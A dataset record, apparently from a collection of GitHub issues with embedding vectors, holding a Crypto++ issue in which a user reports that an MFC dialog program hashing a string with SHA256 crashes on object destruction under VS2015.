-0.027427082881331444, -0.020501192659139633, -0.004392618779093027, 0.002820123452693224, -0.0035908189602196217, -0.02491109073162079, -0.007727691438049078, 0.013575300574302673, -0.013264257460832596, -0.009759838692843914, -0.009573213756084442, -0.009621597826480865, -0.0005581494187936187, 0.007126341573894024, 0.011785075068473816, 0.019920578226447105, 0.00058622972574085, 0.027745038270950317, -0.015565975569188595, 0.005405236501246691, -0.0059582022950053215, -0.01473652757704258, 0.009434971958398819, 0.001833425834774971, -0.02806299366056919, -0.011522416025400162, 0.0005058769602328539, 0.003475041827186942, 0.0017478890949860215, 0.01024368405342102, -0.02113710157573223, 0.0093796756118536, 0.017611946910619736, -0.007098693400621414, 0.00955938920378685, -0.009746015071868896, 0.012960126623511314, -0.004002086818218231, 0.0045999810099601746, -0.007402824237942696, 0.011045483872294426, -0.021040333434939384, -0.013271169736981392, 0.012040821835398674, 0.0062450529076159, -0.007347527425736189, 0.004558508284389973, 0.0324590690433979, -0.02337661199271679, -0.015994524583220482, -0.009718366898596287, 0.012538489885628223, 0.01663043349981308, 0.0012597242603078485, 0.024427246302366257, -0.015151252038776875, 0.02166241966187954, 0.02427517995238304, -0.010865770280361176, 0.003805093001574278, 0.03071722760796547, 0.03243141993880272, -0.000333291245624423, 0.025892604142427444, 0.000323787156958133, 0.01710045523941517, 0.025837307795882225, 0.013008510693907738, -0.011653745546936989, -0.020197059959173203, 0.010851945728063583, -0.005768120288848877, 0.03436679765582085, -0.01603599637746811, 0.00961468555033207, 0.0016459360485896468, -0.024358125403523445, -0.010782824829220772, -0.015137427486479282, 0.011100780218839645, 0.009987937286496162, 0.009898080490529537, 0.015621271915733814, 0.004855727311223745, -0.02634880132973194, -0.0001129691008827649, 0.02214626409113407, -0.027178248390555382, 0.00007025468221399933, 0.007451208774000406, -0.01228274405002594, 0.007824460044503212, -0.0035026902332901955, -0.023653093725442886, -0.01574569009244442, -0.014847120270133018, -0.012828797101974487, 0.015013010241091251, -0.008425810374319553, 0.005768120288848877, -0.009448796510696411, -0.035251542925834656, -0.007589450106024742, 0.0005788856651633978, -0.010630759410560131, -0.014778000302612782, -0.005239346995949745, 0.0069224354811012745, -0.011328878812491894, 0.01989292912185192, 0.012856445275247097, -0.008716116659343243, 0.014335627667605877, -0.008370514027774334, 0.0029791011475026608, -0.005923641845583916, 0.020639432594180107, -0.00028209874290041625, -0.004848815035074949, -0.00834286492317915, -0.03113195113837719, 0.014487693086266518, -0.019160250201821327, -0.028145939111709595, -0.0025851132813841105, 0.03071722760796547, -0.0006592384306713939, -0.000016578162103542127, 0.009815135970711708, -0.006538815796375275, 0.010388837195932865, 0.018012847751379013, 0.005349940154701471, 0.01888376846909523, -0.004679469391703606, -0.01922937110066414, -0.008923479355871677, 0.009987937286496162, 0.022754525765776634, -0.014418572187423706, -0.03350970149040222, -0.018634933978319168, 0.007354439701884985, -0.02728884108364582, -0.0010739624267444015, -0.0028702360577881336, 0.0011240749154239893, 0.007188550196588039, -0.029168924316763878, 0.01231039222329855, 0.011176813393831253, 0.020197059959173203, -0.01616041362285614, -0.012296567671000957, -0.009262170642614365, -0.02301718480885029, 0.0277726873755455, 0.013900167308747768, -0.01816491223871708, 0.009068632498383522, 0.017888430505990982, -0.000670470530167222, 0.0037152362056076527, -0.013526915572583675, -0.013727365992963314, -0.006690881215035915, 0.015787161886692047, -0.0033056961838155985, -0.01159844920039177, 0.004734766203910112, -0.012483193539083004, 0.0007840876351110637, -0.010485606268048286, 0.014266506768763065, 0.020929740741848946, -0.011522416025400162, -0.007361351978033781, -0.00961468555033207, -0.018330803140997887, 0.008398162201046944, -0.028132114559412003, 0.015883930027484894, 0.006369470153003931, 0.02030765451490879, -0.03914995118975639, -0.003653027582913637, 0.02977718599140644, 0.018386099487543106, -0.022643933072686195, -0.012185974977910519, 0.00747194467112422, -0.015635095536708832, 0.02043207176029682, -0.01198552455753088, 0.009386587888002396, 0.021814484149217606, 0.006811842322349548, -0.0032244795002043247, 0.01109386794269085, -0.0007477992912754416, -0.019035832956433296, -0.0015664473176002502, 0.009600861929357052, -0.01139799878001213, -0.003808549139648676, 0.021800659596920013, 0.005902905482798815, 0.009697630070149899, 0.0027285385876893997, 0.005847609136253595, -0.02195272594690323, -0.02905833162367344, -0.002241237787529826, 0.014079880900681019, -0.0025833852123469114, -0.008073294535279274, -0.0003788676986005157, -0.018358450382947922, -0.0045999810099601746, 0.010948714800179005, -0.010126179084181786, -0.04020058363676071, 0.0005253170966170728, -0.025311991572380066, -0.017017509788274765, -0.02639027312397957, 0.006037690676748753, -0.02319689840078354, 0.005508917849510908, 0.02763444557785988, 0.00813550315797329, -0.014957713894546032, 0.02491109073162079, -0.018676405772566795, 0.015607448294758797, -0.012407161295413971, 0.004143784288316965, -0.002398487413302064, 0.011446383781731129, 0.004859183449298143, -0.009725279174745083, 0.01455681398510933, 0.012469369918107986, -0.02303100936114788, 0.004834990948438644, -0.008868182078003883, -0.00206498010084033, -0.017363112419843674, 0.006960452068597078, 0.005571126472204924, 0.006746177561581135, -0.02538111060857773, -0.00489719957113266, -0.000012231119399075396, -0.014052232727408409, -0.02509080432355404, 0.006314173340797424, -0.005412148777395487, 0.008045646362006664, -0.001189739559777081, -0.02112327702343464, -0.03342675790190697, 0.001277868403121829, 0.012566138058900833, 0.0016381599707528949, 0.013326466083526611, -0.017501354217529297, 0.007257670629769564, -0.0058303289115428925, 0.0060549709014594555, 0.0019474750151857734, -0.004786606878042221, 0.004748590290546417, 0.007067589089274406, -0.02059796079993248, -0.003530338406562805, 0.010796649381518364, -0.03845874220132828, -0.014612110331654549, 0.0007037348696030676, -0.025602297857403755, -0.019851457327604294, 0.009345115162432194, 0.014570637606084347, 0.0007119429646991193, -0.024966387078166008, -0.028367124497890472, 0.004620716907083988, 0.02604467049241066, 0.01958879828453064, 0.021648595109581947, 0.0006968227680772543, -0.002659417921677232, 0.017653420567512512, 0.0014774544397369027, 0.0011664113262668252, -0.009642333723604679, -0.012732028029859066, 0.0016675362130627036, 0.001664944225922227, -0.01769489236176014, 0.0015984155470505357, -0.028615958988666534, 0.008425810374319553, -0.0044686514884233475, 0.019975874572992325, -0.002363926963880658, 0.010948714800179005, 0.015040658414363861, 0.00578540051355958, -0.014695054851472378, -0.024593135342001915, 0.00887509435415268, -0.010423397645354271, 0.003086238168179989, -0.003423201385885477, 0.005246259272098541, -0.034477390348911285, 0.000833336147479713, 0.028781848028302193, 0.0026231296360492706, 0.009600861929357052, 0.011916404590010643, -0.013001598417758942, -0.009573213756084442, 0.018151089549064636, 0.0038396534509956837, 0.03561097010970116, -0.0272335447371006, -0.015317141078412533, -0.0020027714781463146, -0.012427897192537785, -0.0008480242686346173, -0.0030430376064032316, -0.006950083654373884, 0.010347364470362663, 0.01257305033504963, -0.02260245941579342, -0.01450151763856411, -0.00940732378512621, -0.024994036182761192, 0.008508754894137383, 0.0187593512237072, -0.009987937286496162, -0.004506668075919151, 0.013478531502187252, 0.0021531090606004, 0.010285155847668648, 0.002754458924755454, -0.010050145909190178, 0.003354080719873309, 0.0016079196939244866, 0.007935053668916225, -0.005550390109419823, -0.006590656470507383, 0.03256966173648834, -0.012828797101974487, 0.004558508284389973, -0.0324590690433979, -0.0007400232134386897, -0.02456548810005188, -0.025726715102791786, -0.004786606878042221, -0.023473380133509636, -0.009552476927638054, 0.007067589089274406, -0.007693130988627672, -0.010084706358611584, 0.008633172139525414, -0.012109941802918911, 0.002163477009162307, -0.015883930027484894, 0.0031467187218368053, -0.002890972187742591, -0.0070261163637042046, -0.016547489911317825, 0.0015197908505797386, -0.008992599323391914, -0.013008510693907738, -0.0065491837449371815, 0.007824460044503212, -0.021399760618805885, 0.003666851669549942, 0.03273555263876915, -0.012317304499447346, -0.005574582144618034, 0.004907567985355854, 0.002699162345379591, -0.0038707577623426914, -0.010817385278642178, -0.0013305729953572154, 0.02905833162367344, 0.005432885140180588, 0.016713378950953484, 0.0071678138338029385, -0.005947833880782127, 0.023528676480054855, 0.004479019436985254, -0.013990024104714394, -0.030330151319503784, 0.027855630964040756, 0.01757047511637211, 0.012621435336768627, -0.0015854554949328303, 0.0018939065048471093, -0.01729399338364601, 0.009317466989159584, 0.0009460892179049551, -0.0011059307726100087, 0.011356526985764503, -0.009718366898596287, -0.0020597961265593767, -0.0006363422144204378, 0.019906753674149513, 0.03475387394428253, 0.008619347587227821, -0.010057058185338974, 0.022339802235364914, 0.009269081987440586, 0.013955463655292988, 0.0017867693677544594, 0.008294480852782726, 0.008211536332964897, -0.008218447677791119, -0.018565813079476357, -0.006127547938376665, 0.007039940450340509, 0.002875420032069087, 0.026597635820508003, 0.022104792296886444, 0.0026231296360492706, -0.01982381008565426, -0.004261289723217487, -0.002135828835889697, 0.010333540849387646, 0.0021012683864682913, 0.012814972549676895, 0.019740864634513855, 0.009462620131671429, -0.010865770280361176, 0.0029756450094282627, -0.016768675297498703, 0.0018230577697977424, -0.011411823332309723, -0.015317141078412533, -0.004707118030637503, -0.004620716907083988, -0.0039744386449456215, 0.01940908469259739, -0.02077767439186573, -0.016257181763648987, 0.015427734702825546, 0.004275113809853792, -0.0004145080456510186, 0.011453296057879925, -0.0018403379945084453, -0.0027423626743257046, -0.005235890857875347, 0.005114929750561714, -0.008882006630301476, 0.02231215313076973, -0.020280005410313606, 0.014805648475885391, 0.0003846997569780797, -0.011605361476540565, -0.006929347757250071, 0.014432396739721298, -0.009600861929357052, 0.014584462158381939, 0.021054157987236977, -0.017916077747941017, -0.009358938783407211, -0.004807342775166035, 0.009338202886283398, -0.0021133646368980408, 0.007430472411215305, -0.008425810374319553, -0.009870432317256927, 0.00525317108258605, -0.006445502862334251, -0.013948552310466766, -0.01101092342287302, -0.009669981896877289, 0.0075410655699670315, -0.01693456433713436, 0.023307491093873978, -0.011522416025400162, 0.026307327672839165, -0.012925566174089909, -0.013810310512781143, -0.006410942412912846, 0.002080532256513834, 0.003302240278571844, -0.005529653746634722, -0.0018921784358099103, 0.004828079137951136, 0.03303968161344528, 0.0015932315727695823, 0.015897754579782486, 0.003134622471407056, 0.03461563214659691, -0.013672069646418095, 0.01388634368777275, 0.002643865766003728, 0.006172476336359978, -0.010851945728063583, 0.025851132348179817, -0.00864008441567421, 0.0018990904791280627, -0.010333540849387646, 0.005291187670081854, -0.015524503774940968, 0.015109779313206673, 0.004019367042928934, -0.008170063607394695, -0.028145939111709595, 0.013008510693907738, 0.012662907131016254, 0.0071747261099517345, 0.024053994566202164, 0.024593135342001915, -0.0050700013525784016, -0.002099540550261736, -0.004859183449298143, 0.016823971644043922, -0.015234196558594704, -0.00423018541187048, -0.004949040245264769, 0.0030274854507297277, 0.006037690676748753, -0.001954386942088604, 0.00736826378852129, -0.03212729096412659, -0.02113710157573223, -0.0018455219687893987, -0.006780738011002541, 0.017183398827910423, 0.001145675196312368, 0.006825666408985853, 0.03397972509264946, 0.033122625201940536, 0.016588961705565453, 0.00723693473264575, -0.0016770403599366546, -0.004814255051314831, 0.0010091618169099092, 0.007465032860636711, -0.006310717668384314, 0.005208242684602737, 0.027745038270950317, 0.001766033237800002, -0.0013046527747064829, 0.02153800241649151, -0.008771413937211037, -0.010990187525749207, 0.01376192644238472, 0.012849532999098301, 0.006915523204952478, 0.006258876994252205, -0.0001612455671420321, 0.014833296649158001, -0.0030482218135148287, -0.00846037082374096, -0.014819472096860409, -0.003350624581798911, -0.009282906539738178, 0.01497153751552105, 0.008958038873970509, 0.01846904493868351, 0.006763457786291838, 0.01900818571448326, -0.00045144438627175987, -0.0018420659471303225, 0.0031484467908740044, 0.013810310512781143, 0.01106621976941824, -0.002890972187742591, 0.01763959601521492, -0.0058303289115428925, 0.013222784735262394, -0.0029652768280357122, 0.0061828442849218845, 0.02728884108364582, 0.023418083786964417, 0.01468123123049736, 0.008266832679510117, -0.002624857472255826, 0.013008510693907738, 0.007596361916512251, 0.002590297255665064, -0.003995175007730722, 0.004461739677935839, -0.005633335094898939, -0.0011085227597504854, -0.002877148101106286, 0.011798898689448833, 0.002861595945432782, -0.0230863057076931, -0.00616902019828558, 0.005826872773468494, 0.008729941211640835, 0.006383294239640236, 0.012068470008671284, -0.006770370062440634, -0.024164587259292603, 0.0027423626743257046, 0.006853314582258463, 0.0010273059597238898, 0.01266981940716505, 0.01198552455753088, -0.007630922365933657, 0.011881844140589237, 0.010568550787866116, 0.014515341259539127, 0.002014867728576064, 0.008854358457028866, -0.012552314437925816, 0.00036266754614189267, -0.0015275669284164906, 0.0034508495591580868, 0.01752900332212448, 0.002616217592731118, -0.00402627931907773, -0.02811829000711441, -0.002063252031803131, 0.00012409320333972573, -0.0077899000607430935, 0.009835871867835522, -0.010340453125536442, -0.002261974150314927, 0.00542942900210619, -0.03892876207828522, -0.007319879252463579, 0.005180594511330128, 0.0031294384971261024, -0.029196573421359062, -0.0007192870252765715, 0.001155179226770997, -0.004755502566695213, 0.011453296057879925, 0.007458120584487915, 0.013132927939295769, 0.0009573213174007833, -0.026860293000936508, 0.004734766203910112, 0.001766033237800002, 0.014038409106433392, -0.018925240263342857, 0.02611379139125347, -0.003777444828301668, -0.01627100631594658, -0.02059796079993248, -0.0006747905863448977, 0.012289655394852161, -0.013962375931441784, -0.0055814944207668304, 0.020915916189551353, 0.0000469804581371136, 0.023473380133509636, 0.015897754579782486, -0.004665645305067301, 0.015524503774940968, 0.002941084560006857, -0.00025013042613863945, 0.020998859778046608, 0.01103857159614563, -0.012317304499447346, 0.004164520651102066, -0.015303317457437515, 0.02451019175350666, 0.014307979494333267, -0.014833296649158001, 0.0008916566730476916, -0.006345277652144432, 0.009047896601259708, 0.018261682242155075, -0.005778488237410784, 0.015234196558594704, 0.015510679222643375, 0.018206385895609856, -0.005906361620873213, -0.0008553683292120695, -0.016823971644043922, -0.01391399186104536, 0.018192561343312263, 0.032873790711164474, -0.00006129060056991875, -0.01581481099128723, -0.016367776319384575, 0.03284614533185959, -0.002522904658690095, -0.020556489005684853, -0.012469369918107986, 0.009144664742052555, -0.01628483086824417, 0.015330965630710125, -0.0043511465191841125, 0.0032780480105429888, 0.003367904806509614, -0.000731815118342638, 0.00035661947913467884, -0.016851620748639107, 0.00318819098174572, 0.010921066626906395, 0.002417495474219322, -0.006493887398391962, 0.016547489911317825, -0.01468123123049736, 0.006310717668384314, -0.0021582930348813534, 0.005999674554914236, 0.019160250201821327, -0.011536240577697754, 0.003863845719024539, 0.011881844140589237, -0.012821884825825691, -0.01003632228821516, 0.017681067809462547, -0.005892537534236908, 0.0048211668618023396, 0.01151550468057394, 0.006974276155233383, 0.004427179228514433, -0.00563679076731205, 0.0056851753033697605, 0.004669101443141699, 0.006760002113878727, 0.022713053971529007, -0.02763444557785988, 0.04990512505173683, -0.015303317457437515, 0.033233221620321274, 0.007776075974106789, -0.024731377139687538, -0.028076818212866783, -0.003229663474485278, 0.0017556650564074516, 0.006504255346953869, -0.006417854689061642, 0.022284505888819695, 0.0109556270763278, 0.0029376286547631025, 0.009697630070149899, 0.018482867628335953, 0.0047209421172738075, 0.009469532407820225, 0.0006514623528346419, -0.035196248441934586, -0.025547001510858536, -0.011612272821366787, 0.007568713743239641, 0.03024720773100853, -0.006649408955127001, -0.007067589089274406, -0.014722703956067562, 0.002260246081277728, 0.025547001510858536, 0.007865932770073414, -0.00846037082374096, 0.008743764832615852, 0.007948877289891243, 0.009296730160713196, 0.011162988841533661, -0.005851064808666706, 0.01183345913887024, -0.004800430964678526, 0.01053399033844471, -0.019367612898349762, 0.0010739624267444015, 0.004413355141878128, -0.007243846543133259, 0.02734413929283619, -0.0034162893425673246, 0.003284960053861141, 0.012510841712355614, -0.006092987488955259, -0.0026732420083135366, 0.025560826063156128, 0.014460044912993908, 0.008501842617988586, 0.011764338240027428, -0.02598937414586544, 0.000917576951906085, 0.013844870962202549, 0.01506830658763647, 0.015621271915733814, -0.004517036024481058, -0.01029898039996624, 0.007064132951200008, -0.007686218712478876, 0.0002967868931591511, 0.004807342775166035, -0.00695699593052268, -0.023722214624285698, 0.004375338554382324, -0.027040008455514908, -0.0001399693574057892, 0.01024368405342102, 0.009828959591686726, -0.004762414377182722, 0.007596361916512251, -0.0013556291814893484, 0.0032192952930927277, 0.004288937896490097, -0.007624010089784861, 0.0031691829208284616, 0.000829448108561337, 0.0030966061167418957, 0.012089205905795097, 0.008522579446434975, -0.014100617729127407, -0.01412135362625122, -0.0024451438803225756, -0.007700043264776468, -0.008176975883543491, -0.01693456433713436, -0.01585628278553486, -0.0009486812632530928, 0.022823646664619446, 0.009047896601259708, 0.010589287616312504, -0.004192168824374676, -0.0033368004951626062, 0.009165401570498943, -0.0030775980558246374, 0.0029929252341389656, 0.019616447389125824, 0.0049628643319010735, 0.021054157987236977, 0.02350102923810482, 0.00723693473264575, -0.019284667447209358, 0.006542271934449673, 0.0069258916191756725, -0.007651658728718758, 0.0033800010569393635, -0.011992436833679676, -0.021980375051498413, 0.000670470530167222, 0.01918789930641651, -0.003666851669549942, -0.00528081925585866, 0.01183345913887024, 0.00486955139786005, 0.005695543717592955, 0.004748590290546417, 0.012476281262934208, 0.011169901117682457, -0.011211372911930084, -0.03627452999353409, 0.02112327702343464, 0.03818225860595703, 0.003825829364359379, -0.0013011966366320848, 0.00010659703548299149, -0.004641453269869089, -0.006397118326276541, 0.015524503774940968, -0.0055607580579817295, -0.0031415345147252083, -0.007914316840469837, 0.03420091047883034, 0.010381924919784069, 0.00043762027053162456, 0.020805323496460915, -0.004866095259785652, -0.007361351978033781, 0.010257507674396038, 0.027081480249762535, -0.01776401326060295, -0.001417837804183364, -0.004658733494579792, -0.006995012052357197, -0.013962375931441784, -0.027689741924405098, 0.0017677611904218793, 0.015911579132080078, -0.026970887556672096, 0.003957158420234919, 0.008688468486070633, 0.0055814944207668304, 0.010872681625187397, 0.010782824829220772, -0.013450883328914642, 0.005076913628727198, 0.001888722414150834, 0.008660820312798023, -0.002168661216273904, 0.02030765451490879, -0.009877344593405724, 0.0062035806477069855, -0.011874931864440441, -0.0029013403691351414, 0.02023853361606598, -0.018206385895609856, 0.02041824720799923, -0.0033886409364640713, 0.0020373319275677204, -0.019685568287968636, -0.00276655494235456, -0.012061557732522488, 0.005961657967418432, -0.003559714648872614, 0.001677904394455254, -0.0040781195275485516, 0.004416811279952526, -0.013547652401030064, 0.023473380133509636, -0.009096280671656132, 0.013271169736981392, 0.014750352129340172, -0.002630041679367423, 0.016588961705565453, -0.0005443253321573138, 0.013782662339508533, -0.005450164899230003, 0.01663043349981308, 0.004178344737738371, -0.008329041302204132, -0.02676352486014366, 0.012503929436206818, 0.0010117539204657078, -0.03262495622038841, 0.009683806449174881, -0.004506668075919151, -0.003860389580950141, -0.01580098643898964, 0.012897918000817299, -0.0009063448524102569, 0.005989306606352329, -0.0066701448522508144, 0.010838122107088566, 0.011356526985764503 ]
null
null
null
null
null
null
null
null
null
[ "weidai11", "cryptopp" ]
Hi, I really need help with this done: I have simple program, which is working fine except for deleting part I use VS2015 and my Settings or my program are: General: (Unicode + Use MFC in a Shared DLL) Link: Multi-threaded DLL (/MD) link with static lib "cryptlib.lib" code ``` #define CRYPTOPP_DEFAULT_NO_DLL #define CRYPTOPP_ENABLE_NAMESPACE_WEAK 1 #include <dll.h> #include <cryptlib.h> #include <sha.h> #include <hex.h> #include <filters.h> void CMyDlg::TestCrypto() { using namespace CryptoPP; SHA256 hash; std::string message = "abcdefghijklmnopqrstuvwxyz"; std::string digest; { StringSink MySink(digest); HexEncoder MyHexEncoder(&MySink); HashFilter MyHash(hash, &MyHexEncoder); StringSource s(message, true, &MyHash); s.PumpAll(); } } ``` it building and linking fine, but after function is ran and deleting is being done this function it will crash I have crypto 8.9 / I use WIN_32 Release with Static library (.lib) / Use MFC in a Shared DLL / Unicode / Multi-threaded DLL (/MD) when I use another settings I get link errors etc. (the program must be same compiler options as the crypt.lib) my problem looks a lot like this [https://stackoverflow.com/questions/59163281/runtime-library-heap-error-using-crypto-and-vs2019-with-mfc](https://stackoverflow.com/questions/59163281/runtime-library-heap-error-using-crypto-and-vs2019-with-mfc) but a solution of this was not found by me Kind Regards Dan
destructor delete problem with own dialog program with MFC (Unicode/Use MFC in a Shared DLL) VS2015
https://api.github.com/repos/weidai11/cryptopp/issues/1256/comments
0
2024-01-02T14:51:54
2024-01-02T14:52:39Z
https://github.com/weidai11/cryptopp/issues/1256
2,062,529,664
1,256
false
This is a GitHub Issue repo:cryptopp owner:weidai11 Title : destructor delete problem with own dialog program with MFC (Unicode/Use MFC in a Shared DLL) VS2015 Issue date: --- start body --- Hi, I really need help with this done: I have simple program, which is working fine except for deleting part I use VS2015 and my Settings or my program are: General: (Unicode + Use MFC in a Shared DLL) Link: Multi-threaded DLL (/MD) link with static lib "cryptlib.lib" code ``` #define CRYPTOPP_DEFAULT_NO_DLL #define CRYPTOPP_ENABLE_NAMESPACE_WEAK 1 #include <dll.h> #include <cryptlib.h> #include <sha.h> #include <hex.h> #include <filters.h> void CMyDlg::TestCrypto() { using namespace CryptoPP; SHA256 hash; std::string message = "abcdefghijklmnopqrstuvwxyz"; std::string digest; { StringSink MySink(digest); HexEncoder MyHexEncoder(&MySink); HashFilter MyHash(hash, &MyHexEncoder); StringSource s(message, true, &MyHash); s.PumpAll(); } } ``` it building and linking fine, but after function is ran and deleting is being done this function it will crash I have crypto 8.9 / I use WIN_32 Release with Static library (.lib) / Use MFC in a Shared DLL / Unicode / Multi-threaded DLL (/MD) when I use another settings I get link errors etc. (the program must be same compiler options as the crypt.lib) my problem looks a lot like this [https://stackoverflow.com/questions/59163281/runtime-library-heap-error-using-crypto-and-vs2019-with-mfc](https://stackoverflow.com/questions/59163281/runtime-library-heap-error-using-crypto-and-vs2019-with-mfc) but a solution of this was not found by me Kind Regards Dan --- end body ---
1,719
[ -0.03900863230228424, -0.034252189099788666, -0.021969545632600784, 0.015690460801124573, 0.05002966150641441, 0.00004523175084614195, -0.0230716485530138, 0.01843121647834778, 0.011659085750579834, 0.05382901430130005, -0.018025178462266922, -0.0067177508026361465, -0.03283105790615082, -0.03709445521235466, 0.01238415390253067, 0.0003201626241207123, -0.04022674635052681, -0.00576791213825345, -0.026609977707266808, -0.05005866289138794, 0.0062790848314762115, 0.01318172737956047, -0.002704501850530505, 0.0018960515735670924, -0.013703776523470879, 0.035470303148031235, -0.018909761682152748, -0.026348954066634178, 0.0017773217987269163, 0.01516841258853674, 0.022564101964235306, 0.022651109844446182, 0.01653154008090496, -0.020606419071555138, 0.06456001102924347, -0.009346120059490204, 0.04605628922581673, 0.0521758608520031, 0.006754003930836916, 0.009628896601498127, 0.018938763067126274, -0.020330892875790596, -0.025913912802934647, 0.01329048816114664, 0.003418693318963051, 0.008882077410817146, 0.009048842824995518, -0.004756443202495575, -0.019794343039393425, 0.022970139980316162, 0.014414342120289803, -0.04646232724189758, -0.022462591528892517, -0.045621249824762344, 0.015501943416893482, -0.05005866289138794, 0.024565288797020912, 0.004089381080120802, -0.030104804784059525, 0.005992683116346598, -0.028669171035289764, 0.009766659699380398, 0.022549599409103394, 0.035267286002635956, 0.015878979116678238, 0.059339527040719986, -0.04083580523729324, 0.008381780236959457, -0.003911739215254784, 0.0035618941765278578, -0.022549599409103394, 0.0027208158280700445, -0.005260365083813667, 0.020504910498857498, 0.01864873617887497, -0.030046798288822174, 0.02518884651362896, 0.03599235415458679, 0.013769032433629036, 0.022027552127838135, -0.03723946958780289, 0.02486981637775898, -0.03694944083690643, -0.016981082037091255, 0.018590731546282768, -0.02869817242026329, -0.032280005514621735, -0.08132357150316238, -0.027915099635720253, 0.010955770500004292, -0.02576890029013157, 0.021868037059903145, 0.009150352329015732, -0.023361675441265106, -0.010368465445935726, -0.007859732024371624, -0.03764550760388374, 0.005376375745981932, -0.06473402678966522, 0.001025970559567213, -0.011724341660737991, 0.00595280434936285, -0.037007447332143784, -0.022999141365289688, 0.01928679645061493, 0.018416715785861015, 0.015052402392029762, -0.0023039020597934723, 0.017256606370210648, 0.10707797110080719, 0.011006524786353111, 0.02444927766919136, 0.004705688450485468, 0.0020193131640553474, 0.037384480237960815, 0.006525607779622078, -0.005416254512965679, -0.040516775101423264, -0.032976072281599045, -0.035006262362003326, -0.028466152027249336, -0.043823082000017166, -0.011419814079999924, -0.008693560026586056, -0.04324302822351456, 0.011847603134810925, 0.0013703776057809591, 0.002323841443285346, 0.0027933227829635143, -0.0010930392891168594, -0.015617954544723034, -0.038022540509700775, -0.008099004626274109, 0.008896579034626484, 0.010593236424028873, 0.01065124198794365, -0.004571550991386175, 0.019228791818022728, 0.0009724968113005161, 0.007888734340667725, -0.01690857484936714, -0.02885768748819828, -0.004600553307682276, -0.021331487223505974, -0.02502933144569397, 0.0023909101728349924, -0.008896579034626484, -0.002129885833710432, -0.026958011090755463, -0.00016971111472230405, -0.019301297143101692, -0.01986685022711754, 0.04335903748869896, 0.0006570924306288362, 0.018692240118980408, -0.011789598502218723, 0.01118779182434082, 0.01405905932188034, -0.019228791818022728, -0.024724802002310753, -0.018242700025439262, -0.010382967069745064, 0.02832113765180111, -0.03837057203054428, -0.03039483167231083, 0.027567068114876747, 0.010165446437895298, 0.029640760272741318, -0.039936721324920654, 0.023927228525280952, -0.03384615108370781, 0.035586316138505936, 0.04330103471875191, 0.027451056987047195, -0.04167688265442848, -0.011724341660737991, -0.03433919697999954, 0.011238547042012215, 0.006373343523591757, -0.022172564640641212, -0.004111133050173521, 0.043504051864147186, -0.01421857438981533, 0.0016477159224450588, 0.020809438079595566, -0.031119897961616516, 0.02157801017165184, -0.04092281311750412, 0.025217847898602486, -0.03460022434592247, 0.022187067195773125, -0.014950892888009548, 0.018358709290623665, 0.00012178868928458542, 0.005097224842756987, -0.01152857393026352, -0.03283105790615082, -0.019228791818022728, 0.008534044958651066, -0.0020954450592398643, 0.02588491141796112, -0.02173752523958683, -0.021984048187732697, -0.007453694473952055, -0.021403994411230087, -0.016328521072864532, -0.02072243019938469, 0.02843714877963066, 0.02514534257352352, -0.024043239653110504, 0.036166369915008545, 0.006043437868356705, 0.002967338776215911, 0.0182862039655447, -0.0068953922018408775, 0.0019377429271116853, -0.025783400982618332, 0.0014175070682540536, -0.01892426237463951, -0.00233834283426404, 0.02763957343995571, -0.027973106130957603, 0.009396875277161598, -0.014102563261985779, -0.038080547004938126, 0.022651109844446182, 0.01928679645061493, 0.03262804076075554, -0.0158354751765728, 0.000044750260713044554, 0.04417111352086067, -0.007613209076225758, -0.03344011306762695, 0.029408739879727364, 0.04857952520251274, -0.011949112638831139, 0.0047165644355118275, -0.027929602190852165, -0.025536878034472466, -0.0005320183117873967, 0.019678333774209023, 0.04788345843553543, -0.03921165317296982, -0.039501678198575974, 0.00324105191975832, 0.06798233091831207, -0.012949706055223942, 0.018257200717926025, -0.017894666641950607, 0.03439720347523689, 0.01579197123646736, -0.013065717183053493, 0.03567332401871681, -0.014298331923782825, 0.02901720255613327, 0.0005016560899093747, 0.026015423238277435, 0.011289301328361034, -0.0493335947394371, -0.032599035650491714, 0.034629225730895996, -0.005746160168200731, -0.03198998048901558, 0.04553424194455147, 0.0004325481131672859, -0.002280337503179908, -0.022129060700535774, 0.0213024839758873, 0.010317711159586906, -0.03883461654186249, 0.006039812695235014, -0.025058334693312645, -0.0012697745114564896, 0.03381714969873428, -0.014312833547592163, 0.0049449605867266655, 0.0029999669641256332, 0.03306308016180992, 0.0181121863424778, -0.003636213717982173, 0.012108627706766129, 0.03613736480474472, -0.00805550068616867, 0.032599035650491714, 0.02710302360355854, -0.0075914571061730385, -0.025536878034472466, -0.010549732483923435, -0.05139278620481491, 0.011354557238519192, -0.005673653446137905, 0.005575769115239382, -0.018213696777820587, -0.0022386459168046713, 0.01083975937217474, 0.015385933220386505, -0.023738710209727287, -0.021229976788163185, -0.007439192850142717, -0.0055322651751339436, -0.023042645305395126, -0.04643332585692406, 0.0008723468636162579, -0.007257925812155008, -0.04715839400887489, -0.004618680104613304, 0.042749982327222824, 0.006289960816502571, -0.003041658317670226, -0.020968953147530556, 0.018358709290623665, -0.027828091755509377, -0.013805286027491093, 0.03352712094783783, -0.024521784856915474, 0.011804099194705486, 0.006384219508618116, -0.0213024839758873, -0.017358116805553436, 0.0130149619653821, -0.031699951738119125, 0.043388042598962784, -0.0319029726088047, 0.005626523867249489, 0.022491594776511192, -0.021215476095676422, -0.029785774648189545, 0.007765473332256079, -0.050783731043338776, 0.015646956861019135, -0.0060470630414783955, 0.018155690282583237, -0.050928741693496704, 0.018358709290623665, -0.02024388499557972, -0.02674049139022827, -0.011521322652697563, 0.0009933424880728126, -0.0027443806175142527, -0.0037485992070287466, -0.028770679607987404, 0.015472941100597382, -0.002264023292809725, 0.0027208158280700445, -0.01972183771431446, -0.06711225211620331, -0.0029437742196023464, -0.005724408198148012, 0.011673587374389172, 0.03332410380244255, 0.0009249142603948712, 0.027291541919112206, 0.04277898371219635, 0.02656647376716137, 0.03375914320349693, -0.035470303148031235, 0.003429569536820054, -0.02355019375681877, 0.020968953147530556, 0.0021335112396627665, 0.01986685022711754, 0.007526201196014881, -0.025797903537750244, -0.01248566247522831, -0.02311515249311924, 0.010078438557684422, -0.00994067545980215, -0.025464370846748352, 0.0015027024783194065, 0.0004216720990370959, 0.013928547501564026, -0.008149758912622929, 0.003824731335043907, 0.02259310521185398, -0.03799353912472725, -0.03932766243815422, 0.015211916528642178, 0.02355019375681877, -0.005137103609740734, 0.02125898003578186, -0.001355876331217587, 0.02730604261159897, -0.016125502064824104, -0.038399577140808105, 0.01203612145036459, -0.0181121863424778, -0.034948255866765976, 0.03709445521235466, -0.0379355326294899, -0.0631098747253418, -0.011390810832381248, -0.0006013528909534216, -0.004731065593659878, -0.0016359336441382766, 0.008722562342882156, 0.0601516030728817, 0.004731065593659878, 